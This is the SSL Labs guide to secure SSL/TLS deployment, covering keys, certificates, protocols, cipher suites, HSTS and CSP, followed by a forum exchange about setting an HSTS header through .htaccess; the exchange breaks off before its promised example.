SSL/TLS is a deceptively simple technology. It is easy to deploy, and it just works, except when it does not. The main problem is that encryption is not often easy to deploy correctly. To ensure that TLS provides the necessary security, system administrators and developers must put extra effort into properly configuring their servers and developing their applications.

In 2009, we began our work on SSL Labs because we wanted to understand how TLS was used and to remedy the lack of easy-to-use TLS tools and documentation. We have achieved some of our goals through our global surveys of TLS usage, as well as the online assessment tool, but the lack of documentation is still evident. This document is a step toward addressing that problem.

Our aim here is to provide clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application. In pursuit of clarity, we sacrifice completeness, foregoing certain advanced topics. The focus is on advice that is practical and easy to follow. For those who want more information, Section 6 gives useful pointers.

1 Private Key and Certificate

In TLS, all security starts with the server’s cryptographic identity; a strong private key is needed to prevent attackers from carrying out impersonation attacks. Equally important is to have a valid and strong certificate, which grants the private key the right to represent a particular hostname. Without these two fundamental building blocks, nothing else can be secure.

1.1 Use 2048-Bit Private Keys

For most web sites, security provided by 2,048-bit RSA keys is sufficient. The RSA public key algorithm is widely supported, which makes keys of this type a safe default choice. At 2,048 bits, such keys provide about 112 bits of security. If you want more security than this, note that RSA keys don’t scale very well. To get 128 bits of security, you need 3,072-bit RSA keys, which are noticeably slower. ECDSA keys provide an alternative that offers better security and better performance. At 256 bits, ECDSA keys provide 128 bits of security. A small number of older clients don’t support ECDSA, but modern clients do. It’s possible to get the best of both worlds and deploy with RSA and ECDSA keys simultaneously if you don’t mind the overhead of managing such a setup.
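For reference, a key of each type can be generated with OpenSSL roughly as follows (a sketch with placeholder file names; adapt the paths and curve choice to your environment):

# 2,048-bit RSA private key
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out example.com.rsa.key

# 256-bit ECDSA (P-256) private key
openssl ecparam -name prime256v1 -genkey -noout -out example.com.ecdsa.key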

1.2 Protect Private Keys

Treat your private keys as an important asset, restricting access to the smallest possible group of employees while still keeping your arrangements practical. Recommended policies include the following:

  • Generate private keys on a trusted computer with sufficient entropy. Some CAs offer to generate private keys for you; run away from them.
  • Password-protect keys from the start to prevent compromise when they are stored in backup systems. Private key passwords don’t help much in production because a knowledgeable attacker can always retrieve the keys from process memory. There are hardware devices (called Hardware Security Modules, or HSMs) that can protect private keys even in the case of server compromise, but they are expensive and thus justifiable only for organizations with strict security requirements.
  • After compromise, revoke old certificates and generate new keys.
  • Renew certificates yearly, and more often if you can automate the process. Most sites should assume that a compromised certificate will be impossible to revoke reliably; certificates with shorter lifespans are therefore more secure in practice.
  • Unless keeping the same keys is important for public key pinning, you should also generate new private keys whenever you’re getting a new certificate.

1.3 Ensure Sufficient Hostname Coverage

Ensure that your certificates cover all the names you wish to use with a site. Your goal is to avoid invalid certificate warnings, which confuse users and weaken their confidence.

Even when you expect to use only one domain name, remember that you cannot control how your users arrive at the site or how others link to it. In most cases, you should ensure that the certificate works with and without the www prefix (e.g., that it works for both example.com and www.example.com). The rule of thumb is that a secure web server should have a certificate that is valid for every DNS name configured to point to it.

Wildcard certificates have their uses, but avoid using them if it means exposing the underlying keys to a much larger group of people, and especially if doing so crosses team or department boundaries. In other words, the fewer people there are with access to the private keys, the better. Also be aware that certificate sharing creates a bond that can be abused to transfer vulnerabilities from one web site or server to all other sites and servers that use the same certificate (even when the underlying private keys are different).

Make sure you add all the necessary domain names to the Subject Alternative Name (SAN) field, since modern browsers no longer check the Common Name field during validation.

1.4 Obtain Certificates from a Reliable CA

Select a Certification Authority (CA) that is reliable and serious about its certificate business and security. Consider the following criteria when selecting your CA:

Security posture: All CAs undergo regular audits, but some are more serious about security than others. Figuring out which ones are better in this respect is not easy, but one option is to examine their security history, and, more importantly, how they have reacted to compromises and whether they have learned from their mistakes.

Business focus: CAs whose activities constitute a substantial part of their business have everything to lose if something goes terribly wrong, and they probably won’t neglect their certificate division by chasing potentially more lucrative opportunities elsewhere.

Services offered: At a minimum, your selected CA should provide support for both Certificate Revocation List (CRL) and Online Certificate Status Protocol (OCSP) revocation methods, with rock-solid network availability and performance. Many sites are happy with domain-validated certificates, but you also should consider whether you’ll ever require Extended Validation (EV) certificates. In either case, you should have a choice of public key algorithm. Most web sites use RSA today, but ECDSA may become important in the future because of its performance advantages.

Certificate management options: If you need a large number of certificates and operate in a complex environment, choose a CA that will give you good tools to manage them.

Support: Choose a CA that will give you good support if and when you need it.

Note

For best results, acquire your certificates well in advance and at least one week before deploying them to production. This practice (1) helps avoid certificate warnings for some users who don’t have the correct time on their computers and (2) helps avoid failed revocation checks with CAs who need extra time to propagate new certificates as valid to their OCSP responders. Over time, try to extend this “warm-up” period to 1-3 months. Similarly, don’t wait until your certificates are about to expire to replace them. Leaving an extra several months of margin similarly helps with users whose clocks are incorrect in the other direction.

1.5 Use Strong Certificate Signature Algorithms

Certificate security depends (1) on the strength of the private key that was used to sign the certificate and (2) on the strength of the hashing function used in the signature. Until recently, most certificates relied on the SHA1 hashing function, which is now considered insecure. As a result, we’re currently in transition to SHA256. As of January 2016, you shouldn’t be able to get a SHA1 certificate from a public CA. Leaf and intermediate certificates with SHA1 signatures are now considered insecure by browsers.

1.6 Use DNS CAA

DNS CAA[8] is a standard that allows domain name owners to restrict which CAs can issue certificates for their domains. In September 2017, the CA/Browser Forum mandated CAA support as part of its certificate issuance standard baseline requirements. With CAA in place, the attack surface for fraudulent certificates is reduced, effectively making sites more secure. If a CA has an automated process in place for issuing certificates, it should check for a DNS CAA record, as this reduces the improper issuance of certificates.

It is recommended to whitelist CAs by adding CAA records for your domain, listing only the CAs you trust to issue certificates for it.
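As a small illustration (hypothetical domain and CA), CAA records in a zone file might look like this:

example.com.   IN   CAA   0 issue "letsencrypt.org"
example.com.   IN   CAA   0 iodef "mailto:security@example.com"

Only the CA (or CAs) named in issue records may issue certificates for the domain; the optional iodef record tells CAs where to report requests that violate the policy.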

2 Configuration

With correct TLS server configuration, you ensure that your credentials are properly presented to the site’s visitors, that only secure cryptographic primitives are used, and that all known weaknesses are mitigated.

2.1 Use Complete Certificate Chains

In most deployments, the server certificate alone is insufficient; two or more certificates are needed to build a complete chain of trust. A common configuration problem occurs when deploying a server with a valid certificate, but without all the necessary intermediate certificates. To avoid this situation, simply use all the certificates provided to you by your CA in the same sequence.

An invalid certificate chain effectively renders the server certificate invalid and results in browser warnings. In practice, this problem is sometimes difficult to diagnose because some browsers can reconstruct incomplete chains and some can’t. All browsers tend to cache and reuse intermediate certificates.
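For example, on an Apache server this usually comes down to pointing the configuration at a file that contains the leaf certificate followed by the intermediates, in order (a sketch with hypothetical paths; Apache 2.4.8 and newer read the whole chain from SSLCertificateFile, while older versions need a separate SSLCertificateChainFile directive):

# Leaf certificate plus intermediates, concatenated in order, in one file
SSLCertificateFile      /etc/ssl/example.com/fullchain.pem
SSLCertificateKeyFile   /etc/ssl/example.com/privkey.pem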

2.2 Use Secure Protocols

There are six protocols in the SSL/TLS family: SSL v2, SSL v3, TLS v1.0, TLS v1.1, TLS v1.2, and TLS v1.3:

  • SSL v2 is insecure and must not be used. This protocol version is so bad that it can be used to attack RSA keys and sites with the same name even if they are on entirely different servers (the DROWN attack).
  • SSL v3 is insecure when used with HTTP (the SSLv3 POODLE attack) and weak when used with other protocols. It’s also obsolete and shouldn’t be used.
  • TLS v1.0 and TLS v1.1 are legacy protocols that shouldn’t be used, but they are typically still necessary in practice. Their major weakness (BEAST) has been mitigated in modern browsers, but other problems remain. TLS v1.0 has been deprecated by PCI DSS, and both TLS v1.0 and TLS v1.1 were deprecated by modern browsers in January 2020. Check the SSL Labs blog for details.
  • TLS v1.2 and v1.3 are both without known security issues.

TLS v1.2 or TLS v1.3 should be your main protocol because these versions offer modern authenticated encryption (also known as AEAD). If you don’t support TLS v1.2 or TLS v1.3 today, your security is lacking.

In order to support older clients, you may need to continue to support TLS v1.0 and TLS v1.1 for now. However, you should plan to retire TLS v1.0 and TLS v1.1 in the near future. For example, the PCI DSS standard will require all sites that accept credit card payments to remove support for TLS v1.0 by June 2018. Similarly, modern browsers will remove the support for TLS v1.0 and TLS v1.1 by January 2020.
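To make the protocol recommendations above concrete, on an Apache (mod_ssl) server such a policy can be expressed roughly as follows (a sketch; add +TLSv1 and +TLSv1.1 back only if you still must support legacy clients, and note that TLS v1.3 requires a sufficiently recent OpenSSL):

# Disable everything, then enable only TLS v1.2 and TLS v1.3
SSLProtocol -all +TLSv1.2 +TLSv1.3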

Benefits of using TLS v1.3:

  • Improved performance (i.e., reduced latency)
  • Improved security
  • Removal of obsolete and insecure features such as legacy cipher suites and compression
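
As an illustration only (the exact directives depend on your server software and version; TLS v1.3 requires OpenSSL 1.1.1 or newer on both of the platforms shown), restricting a server to TLS v1.2 and v1.3 is typically a one-line change:

# Apache (mod_ssl)
SSLProtocol -all +TLSv1.2 +TLSv1.3

# nginx
ssl_protocols TLSv1.2 TLSv1.3;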

2.3 Use Secure Cipher Suites

To communicate securely, you must first ascertain that you are communicating directly with the desired party (and not through someone else who will eavesdrop) and exchanging data securely. In SSL and TLS, cipher suites define how secure communication takes place. They are composed from varying building blocks with the idea of achieving security through diversity. If one of the building blocks is found to be weak or insecure, you should be able to switch to another.

You should rely chiefly on the AEAD suites that provide strong authentication and key exchange, forward secrecy, and encryption of at least 128 bits. Some other, weaker suites may still be supported, provided they are negotiated only with older clients that don’t support anything better.

There are several obsolete cryptographic primitives that must be avoided:

  • Anonymous Diffie-Hellman (ADH) suites do not provide authentication.
  • NULL cipher suites provide no encryption.
  • Export cipher suites are insecure when negotiated in a connection, but they can also be used against a server that prefers stronger suites (the FREAK attack).
  • Suites with weak ciphers (112 bits or less) use encryption that can easily be broken and are insecure.
  • RC4 is insecure.
  • 64-bit block ciphers (3DES / DES / RC2 / IDEA) are weak.
  • Cipher suites with RSA key exchange (i.e., TLS_RSA suites) are weak because they do not provide forward secrecy.

There are several cipher suites that must be preferred:

  • AEAD (Authenticated Encryption with Associated Data) cipher suites – CHACHA20_POLY1305, GCM and CCM
  • PFS (Perfect Forward Secrecy) ciphers – ECDHE_RSA, ECDHE_ECDSA, DHE_RSA, DHE_DSS, CECPQ1 and all TLS 1.3 ciphers

Use the following suite configuration, designed for both RSA and ECDSA keys, as your starting point:

TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256

Warning

We recommend that you always first test your TLS configuration in a staging environment, transferring the changes to the production environment only when certain that everything works as expected. Please note that the above is a generic list and that not all systems (especially the older ones) support all the suites. That’s why it’s important to test first.

The above example configuration uses standard TLS suite names. Some platforms use nonstandard names; please refer to the documentation for your platform for more details. For example, the following suite names would be used with OpenSSL:

ECDHE-ECDSA-AES128-GCM-SHA256
ECDHE-ECDSA-AES256-GCM-SHA384
ECDHE-ECDSA-AES128-SHA
ECDHE-ECDSA-AES256-SHA
ECDHE-ECDSA-AES128-SHA256
ECDHE-ECDSA-AES256-SHA384
ECDHE-RSA-AES128-GCM-SHA256
ECDHE-RSA-AES256-GCM-SHA384
ECDHE-RSA-AES128-SHA
ECDHE-RSA-AES256-SHA
ECDHE-RSA-AES128-SHA256
ECDHE-RSA-AES256-SHA384
DHE-RSA-AES128-GCM-SHA256
DHE-RSA-AES256-GCM-SHA384
DHE-RSA-AES128-SHA
DHE-RSA-AES256-SHA
DHE-RSA-AES128-SHA256
DHE-RSA-AES256-SHA256

2.4 Select Best Cipher Suites

In SSL v3 and later protocol versions, clients submit a list of cipher suites that they support, and servers choose one suite from the list to use for the connection. Not all servers do this well, however; some will select the first supported suite from the client’s list. Having servers actively select the best available cipher suite is critical for achieving the best security.
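
On most servers this is a single switch; the directives below are illustrative only, so check your platform’s documentation:

# Apache (mod_ssl)
SSLHonorCipherOrder on

# nginx
ssl_prefer_server_ciphers on;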

2.5 Use Forward Secrecy

Forward secrecy (sometimes also called perfect forward secrecy) is a protocol feature that enables secure conversations that are not dependent on the server’s private key. With cipher suites that do not provide forward secrecy, someone who can recover a server’s private key can decrypt all earlier recorded encrypted conversations. You need to support and prefer ECDHE suites in order to enable forward secrecy with modern web browsers. To support a wider range of clients, you should also use DHE suites as fallback after ECDHE. Avoid the RSA key exchange unless absolutely necessary. My proposed default configuration in Section 2.3 contains only suites that provide forward secrecy.

2.6 Use Strong Key Exchange

For the key exchange, public sites can typically choose between the classic ephemeral Diffie-Hellman key exchange (DHE) and its elliptic curve variant, ECDHE. There are other key exchange algorithms, but they’re generally insecure in one way or another. The RSA key exchange is still very popular, but it doesn’t provide forward secrecy.

In 2015, a group of researchers published new attacks against DHE; their work is known as the Logjam attack.[2] The researchers discovered that lower-strength DH key exchanges (e.g., 768 bits) can easily be broken and that some well-known 1,024-bit DH groups can be broken by state agencies. To be on the safe side, if deploying DHE, configure it with at least 2,048 bits of security. Some older clients (e.g., Java 6) might not support this level of strength. For performance reasons, most servers should prefer ECDHE, which is both stronger and faster. The secp256r1 named curve (also known as P-256) is a good choice in this case.
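
For example, on a server that uses OpenSSL you can generate a 2,048-bit DH group once and point the configuration at it; the nginx directives below are shown as an illustration (the file path is a placeholder):

# one-time: generate a 2,048-bit Diffie-Hellman group
openssl dhparam -out /etc/ssl/dhparams.pem 2048

# nginx: use the generated group for DHE and P-256 (prime256v1) for ECDHE
ssl_dhparam /etc/ssl/dhparams.pem;
ssl_ecdh_curve prime256v1;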

2.7 Mitigate Known Problems

There have been several serious attacks against SSL and TLS in recent years, but they should generally not concern you if you’re running up-to-date software and following the advice in this guide. (If you’re not, I’d advise testing your systems using SSL Labs and taking it from there.) However, nothing is perfectly secure, which is why it is a good practice to keep an eye on what happens in security. Promptly apply vendor patches if and when they become available; otherwise, rely on workarounds for mitigation.

3 Performance

Security is our main focus in this guide, but we must also pay attention to performance; a secure service that does not satisfy performance criteria will no doubt be dropped. With proper configuration, TLS can be quite fast. With modern protocols—for example, HTTP/2—it might even be faster than plaintext communication.

3.1 Avoid Too Much Security

The cryptographic handshake, which is used to establish secure connections, is an operation for which the cost is highly influenced by private key size. Using a key that is too short is insecure, but using a key that is too long will result in “too much” security and slow operation. For most web sites, using RSA keys stronger than 2,048 bits and ECDSA keys stronger than 256 bits is a waste of CPU power and might impair user experience. Similarly, there is little benefit to increasing the strength of the ephemeral key exchange beyond 2,048 bits for DHE and 256 bits for ECDHE. There are no clear benefits of using encryption above 128 bits.

3.2 Use Session Resumption

Session resumption is a performance-optimization technique that makes it possible to save the results of costly cryptographic operations and to reuse them for a period of time. A disabled or nonfunctional session resumption mechanism may introduce a significant performance penalty.
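
For example, in nginx a shared session cache can be enabled with two directives (the values are illustrative; roughly 4,000 sessions fit in each megabyte of cache):

ssl_session_cache shared:SSL:10m;
ssl_session_timeout 1h;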

3.3 Use WAN Optimization and HTTP/2

These days, TLS overhead doesn’t come from CPU-hungry cryptographic operations, but from network latency. A TLS handshake, which can start only after the TCP handshake completes, requires a further exchange of packets and is more expensive the further away you are from the server. The best way to minimize latency is to avoid creating new connections—in other words, to keep existing connections open for a long time (keep-alives). Other techniques that provide good results include supporting modern protocols such as HTTP/2 and using WAN optimization (usually via content delivery networks).

3.4 Cache Public Content

When communicating over TLS, browsers may assume that all traffic is sensitive. They will typically cache certain resources in memory only, so the content is lost once you close the browser. To gain a performance boost and enable long-term caching of some resources, explicitly mark public resources (e.g., images) as public.
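
For example, a static image that is safe to cache anywhere could be served with a response header such as the following (the max-age value is illustrative):

Cache-Control: public, max-age=2592000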

3.5 Use OCSP Stapling

OCSP stapling is an extension of the OCSP protocol that delivers revocation information as part of the TLS handshake, directly from the server. As a result, the client does not need to contact OCSP servers for out-of-band validation and the overall TLS connection time is significantly reduced. OCSP stapling is an important optimization technique, but you should be aware that not all web servers provide solid OCSP stapling implementations. Combined with a CA that has a slow or unreliable OCSP responder, such web servers might create performance issues. For best results, simulate failure conditions to see if they might impact your availability.
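
As an illustration, enabling stapling looks like this on two common servers (for nginx you may also need a resolver directive and a trusted certificate bundle, depending on your setup):

# nginx
ssl_stapling on;
ssl_stapling_verify on;

# Apache (mod_ssl)
SSLUseStapling on
SSLStaplingCache "shmcb:logs/ssl_stapling(32768)"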

3.6 Use Fast Cryptographic Primitives

In addition to providing the best security, my recommended cipher suite configuration also provides the best performance. Whenever possible, use CPUs that support hardware-accelerated AES. After that, if you really want a further performance edge (probably not needed for most sites), consider using ECDSA keys.

4 HTTP and Application Security

The HTTP protocol and the surrounding platform for web application delivery continued to evolve rapidly after SSL was born. As a result of that evolution, the platform now contains features that can be used to defeat encryption. In this section, we list those features, along with ways to use them securely.

4.1 Encrypt Everything

The fact that encryption is optional is probably one of the biggest security problems today. We see the following problems:

  • No TLS on sites that need it
  • Sites that have TLS but that do not enforce it
  • Sites that mix TLS and non-TLS content, sometimes even within the same page
  • Sites with programming errors that subvert TLS

Although many of these problems can be mitigated if you know exactly what you’re doing, the only way to reliably protect web site communication is to enforce encryption throughout—without exception.

4.2 Eliminate Mixed Content

Mixed-content pages are those that are transmitted over TLS but include resources (e.g., JavaScript files, images, CSS files) that are not transmitted over TLS. Such pages are not secure. An active man-in-the-middle (MITM) attacker can piggyback on a single unprotected JavaScript resource, for example, and hijack the entire user session. Even if you follow the advice from the previous section and encrypt your entire web site, you might still end up retrieving some resources unencrypted from third-party web sites.
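
For resources you reference yourself, modern browsers also support the upgrade-insecure-requests CSP directive, which rewrites embedded http:// subresource URLs to https:// before fetching them (it does not help if the third party doesn’t support TLS at all):

Content-Security-Policy: upgrade-insecure-requests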

4.3 Understand and Acknowledge Third-Party Trust

Web sites often use third-party services activated via JavaScript code downloaded from another server. A good example of such a service is Google Analytics, which is used on large parts of the Web. Such inclusion of third-party code creates an implicit trust connection that effectively gives the other party full control over your web site. The third party may not be malicious, but large providers of such services are increasingly seen as targets. The reasoning is simple: if a large provider is compromised, the attacker is automatically given access to all the sites that depend on the service.

If you follow the advice from Section 4.2, at least your third-party links will be encrypted and thus safe from MITM attacks. However, you should go a step further than that: learn what services you use and remove them, replace them with safer alternatives, or accept the risk of their continued use. A new technology called subresource integrity (SRI) could be used to reduce the potential exposure via third-party resources.[3]
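
For example, a third-party script protected with SRI looks like the following; the URL is a placeholder, and the integrity value must be the real hash of the exact file you reference:

<script src="https://third-party.example/widget.js"
        integrity="sha384-(base64 hash of the file)"
        crossorigin="anonymous"></script>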

4.4 Secure Cookies

To be properly secure, a web site requires TLS, but also that all its cookies are explicitly marked as secure when they are created. Failure to secure the cookies makes it possible for an active MITM attacker to tease some information out through clever tricks, even on web sites that are 100% encrypted. For best results, consider adding cryptographic integrity validation or even encryption to your cookies.
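
For example, a session cookie with the Secure attribute (plus HttpOnly and SameSite, which are good companions) looks like this; the name and value are placeholders:

Set-Cookie: SESSIONID=<opaque value>; Secure; HttpOnly; SameSite=Lax; Path=/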

4.5 Secure HTTP Compression

The 2012 CRIME attack showed that TLS compression can’t be implemented securely. The only solution was to disable TLS compression altogether. The following year, two further attack variations followed. TIME and BREACH focused on secrets in HTTP response bodies compressed using HTTP compression. Unlike TLS compression, HTTP compression is a necessity and can’t be turned off. Thus, to address these attacks, changes to application code need to be made.[4]

TIME and BREACH attacks are not easy to carry out, but if someone is motivated enough to use them, the impact is roughly equivalent to a successful Cross-Site Request Forgery (CSRF) attack.

4.6 Deploy HTTP Strict Transport Security

HTTP Strict Transport Security (HSTS) is a safety net for TLS. It was designed to ensure that security remains intact even in the case of configuration problems and implementation errors. To activate HSTS protection, you add a new response header to your web sites. After that, browsers that support HSTS (all modern browsers at this time) enforce it.

The goal of HSTS is simple: after activation, it does not allow any insecure communication with the web site that uses it. It achieves this goal by automatically converting all plaintext links to secure ones. As a bonus, it also disables click-through certificate warnings. (Certificate warnings are an indicator of an active MITM attack. Studies have shown that most users click through these warnings, so it is in your best interest to never allow them.)

Adding support for HSTS is the single most important improvement you can make for the TLS security of your web sites. New sites should always be designed with HSTS in mind and the old sites converted to support it wherever possible and as soon as possible. For best security, consider using HSTS preloading,[5] which embeds your HSTS configuration in modern browsers, making even the first connection to your site secure.

The following configuration example activates HSTS on the main hostname and all its subdomains for a period of one year, while also allowing preloading:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

4.7 Deploy Content Security Policy

Content Security Policy (CSP) is a security mechanism that web sites can use to restrict browser operation. Although initially designed to address Cross-Site Scripting (XSS), CSP is constantly evolving and supports features that are useful for enhancing TLS security. In particular, it can be used to restrict mixed content when it comes to third-party web sites, for which HSTS doesn’t help.

To deploy CSP to prevent third-party mixed content, use the following configuration:

Content-Security-Policy: default-src https: 'unsafe-inline' 'unsafe-eval';
                         connect-src https: wss:

Note

This is not the best way to deploy CSP. In order to provide an example that doesn’t break anything except mixed content, I had to disable some of the default security features. Over time, as you learn more about CSP, you should change your policy to bring them back.

4.8 Do Not Cache Sensitive Content

All sensitive content must be communicated only to the intended parties and treated accordingly by all devices. Although proxies do not see encrypted traffic and cannot share content among users, the use of cloud-based application delivery platforms is increasing, which is why you need to be very careful when specifying what is public and what is not.

4.9 Consider Other Threats

TLS is designed to address only one aspect of security—confidentiality and integrity of the communication between you and your users—but there are many other threats that you need to deal with. In most cases, that means ensuring that your web site does not have other weaknesses.

5 Validation

With many configuration parameters available for tweaking, it is difficult to know in advance what impact certain changes will have. Further, changes are sometimes made accidentally; software upgrades can introduce changes silently. For that reason, we advise that you use a comprehensive SSL/TLS assessment tool initially to verify your configuration to ensure that you start out secure, and then periodically to ensure that you stay secure. For public web sites, we recommend the free SSL Labs server test.[6]

6 Advanced Topics

The following advanced topics are currently outside the scope of our guide. They require a deeper understanding of SSL/TLS and Public Key Infrastructure (PKI), and they are still being debated by experts.

6.1 Public Key Pinning

Public key pinning is designed to give web site operators the means to restrict which CAs can issue certificates for their web sites. This feature has been deployed by Google for some time now (hardcoded into their browser, Chrome) and has proven to be very useful in preventing attacks and making the public aware of them. In 2014, Firefox also added support for hardcoded pinning. A standard called Public Key Pinning Extension for HTTP[7] is now available. Public key pinning addresses the biggest weakness of PKI (the fact that any CA can issue a certificate for any web site), but it comes at a cost: deploying it requires significant effort and expertise, and it creates a risk of losing control of your site (if you end up with an invalid pinning configuration). You should consider pinning only if you’re managing a site that might realistically be attacked via a fraudulent certificate.

6.2 DNSSEC and DANE

Domain Name System Security Extensions (DNSSEC) is a set of technologies that add integrity to the domain name system. Today, an active network attacker can easily hijack any DNS request and forge arbitrary responses. With DNSSEC, all responses can be cryptographically traced back to the DNS root. DNS-based Authentication of Named Entities (DANE) is a separate standard that builds on top of DNSSEC to provide bindings between DNS and TLS. DANE could be used to augment the security of the existing CA-based PKI ecosystem or bypass it altogether.

Even though not everyone agrees that DNSSEC is a good direction for the Internet, support for it continues to improve. Browsers don’t yet support either DNSSEC or DANE (preferring similar features provided by HSTS and HPKP instead), but there is some indication that they are starting to be used to improve the security of email delivery.

7 Changes

The first release of this guide was on 24 February 2012. This section tracks the document changes over time, starting with version 1.3.

Version 1.3 (17 September 2013)

The following changes were made in this version:

  • Recommend replacing 1024-bit certificates straight away.
  • Recommend against supporting SSL v3.
  • Remove the recommendation to use RC4 to mitigate the BEAST attack server-side.
  • Recommend that RC4 is disabled.
  • Recommend that 3DES is disabled in the near future.
  • Warn about the CRIME attack variations (TIME and BREACH).
  • Recommend supporting forward secrecy.
  • Add discussion of ECDSA certificates.

Version 1.4 (8 December 2014)

The following changes were made in this version:

  • Discuss SHA1 deprecation and recommend migrating to the SHA2 family.
  • Recommend that SSL v3 is disabled and mention the POODLE attack.
  • Expand Section 3.1 to cover the strength of the DHE and ECDHE key exchanges.
  • Recommend OCSP Stapling as a performance-improvement measure, promoting it to Section 3.5.

Version 1.5 (8 June 2016)

The following changes were made in this version:

  • Refreshed the entire document to keep up with the times.
  • Recommended use of authenticated cipher suites.
  • Spent more time discussing key exchange strength and the Logjam attack.
  • Removed the recommendation to disable client-initiated renegotiation. Modern software does this anyway, and it might be impossible or difficult to disable it with something older. At the same time, the DoS vector isn’t particularly strong. Overall, I feel it’s better to spend available resources fixing something else.
  • Added a warning about flaky OCSP stapling implementations.
  • Added mention of subresource integrity enforcement.
  • Added mention of cookie integrity validation and encryption.
  • Added mention of HSTS preloading.
  • Recommended using CSP for better handling of third-party mixed content.
  • Mentioned FREAK, Logjam, and DROWN attacks.
  • Removed the section that discussed mitigation of various TLS attacks, which are largely obsolete by now, especially if the advice presented here is followed. Moved discussion of CRIME variants into a new section.
  • Added a brief discussion of DNSSEC and DANE to the Advanced section.

Version 1.6 (15 January 2020)

The following changes were made in this version:

  • Refreshed the entire document to keep up with the times.
  • Added details on using SAN (Subject Alternative Names), since the Common Name is deprecated by the latest browsers.
  • Noted SHA1 signature deprecation for leaf and intermediate certificates.
  • Added DNS CAA information and recommended its use.
  • Added information about the extra download of missing intermediate certificates and the order in which certificates should be served.
  • Recommended the use of TLS v1.3.
  • Recommended against the legacy protocols TLS v1.0 and TLS v1.1.
  • Improved the secure cipher suites section with more information and newly discovered weak/insecure ciphers.
  • Updated the HSTS preload footnote link.

Acknowledgments

Special thanks to Marsh Ray, Nasko Oskov, Adrian F. Dimcev, and Ryan Hurst for their valuable feedback and help in crafting the initial version of this document. Also thanks to many others who generously share their knowledge of security and cryptography with the world. The guidelines presented here draw on the work of the entire security community.

About SSL Labs

SSL Labs (www.ssllabs.com) is Qualys’s research effort to understand SSL/TLS and PKI as well as to provide tools and documentation to assist with assessment and configuration. Since 2009, when SSL Labs was launched, hundreds of thousands of assessments have been performed using the free online assessment tool. Other projects run by SSL Labs include periodic Internet-wide surveys of TLS configuration and SSL Pulse, a monthly scan of about 150,000 most popular TLS-enabled web sites in the world.

About Qualys

Qualys, Inc. (NASDAQ: QLYS) is a pioneer and leading provider of cloud-based security and compliance solutions with over 9,300 customers in more than 100 countries, including a majority of each of the Forbes Global 100 and Fortune 100. The Qualys Cloud Platform and integrated suite of solutions help organizations simplify security operations and lower the cost of compliance by delivering critical security intelligence on demand and automating the full spectrum of auditing, compliance and protection for IT systems and web applications. Founded in 1999, Qualys has established strategic partnerships with leading managed service providers and consulting organizations including Accenture, BT, Cognizant Technology Solutions, Deutsche Telekom, Fujitsu, HCL, HP Enterprise, IBM, Infosys, NTT, Optiv, SecureWorks, Tata Communications, Verizon and Wipro. The company is also a founding member of the Cloud Security Alliance (CSA). For more information, please visit www.qualys.com.

[1] Transport Layer Security (TLS) Parameters (IANA, retrieved 18 March 2016)

[2] Weak Diffie-Hellman and the Logjam Attack (retrieved 16 March 2016)

[3] Subresource Integrity (Mozilla Developer Network, retrieved 16 March 2016)

[4] Defending against the BREACH Attack (Qualys Security Labs; 7 August 2013)

[5] HSTS Preload List (Google developers, retrieved 16 March 2016)

[6] SSL Labs (retrieved 16 March 2016)

[7] RFC 7469: Public Key Pinning Extension for HTTP (Evans et al, April 2015)

[8] RFC 6844: DNS Certification Authority Authorization (CAA) Resource Record (Hallam-Baker and Stradling, January 2013)

Source :
https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices

Warning: Unnecessary HSTS header over HTTP

We would like to add the HSTS header to our page https://www.wipfelglueck.de.
Our page is running on a shared server, so we don’t have access to the httpd.conf. We tried to enable this header via the .htaccess file like this:

<IfModule mod_headers.c>
  DefaultLanguage de
  Header set X-XSS-Protection "1; mode=block"
  Header set X-Frame-Options "sameorigin"
  Header set X-Content-Type-Options "nosniff"

  Header set X-Permitted-Cross-Domain-Policies "none"

  Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"

  Header set Referrer-Policy "no-referrer"

  <FilesMatch "\.(js|css|xml|gz)$">
    Header append Vary Accept-Encoding
  </FilesMatch>

  <FilesMatch "\.(ico|jpg|jpeg|png|gif|webp)$">
    Header set Cache-Control "max-age=2592000, public"
  </FilesMatch>
  <FilesMatch "\.(css|js|json|html)$">
    Header set Cache-Control "max-age=604800, public"
  </FilesMatch>
</IfModule>

When we check the page we receive the warning in subject with this text:
“The HTTP page at http://wipfelglueck.de sends an HSTS header. This has no effect over HTTP, and should be removed.”

I tried several ways to solve this but haven’t been successful so far. I can’t find a solution on the web, so I would be happy if you could give me a hint on this!

Thank you very much!!


Thank you very much for your response!
With the header:

Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS

or

Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS

there is no error, the page runs, but when I check the page this error is mentioned:

Error: No HSTS header
Response error: No HSTS header is present on the response.

That’s strange. What did I do wrong?

Answer

You can conditionally set headers using env=

Header always set Strict-Transport-Security "..." env=HTTPS

(you can use both always and env= simultaneously, the former only filters by response status)

That being said, do not optimize for benchmarks or compliance checkmarks. This header does nothing over plain HTTP, and caring about it only takes attention away from things that do have an effect. Since these days (almost) all plaintext requests should simply redirect to https://, the same is true of (almost) any response header sent over http://.
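
A minimal .htaccess sketch along those lines, assuming mod_rewrite is available on the shared host, redirects every plaintext request and sends HSTS only on HTTPS responses:

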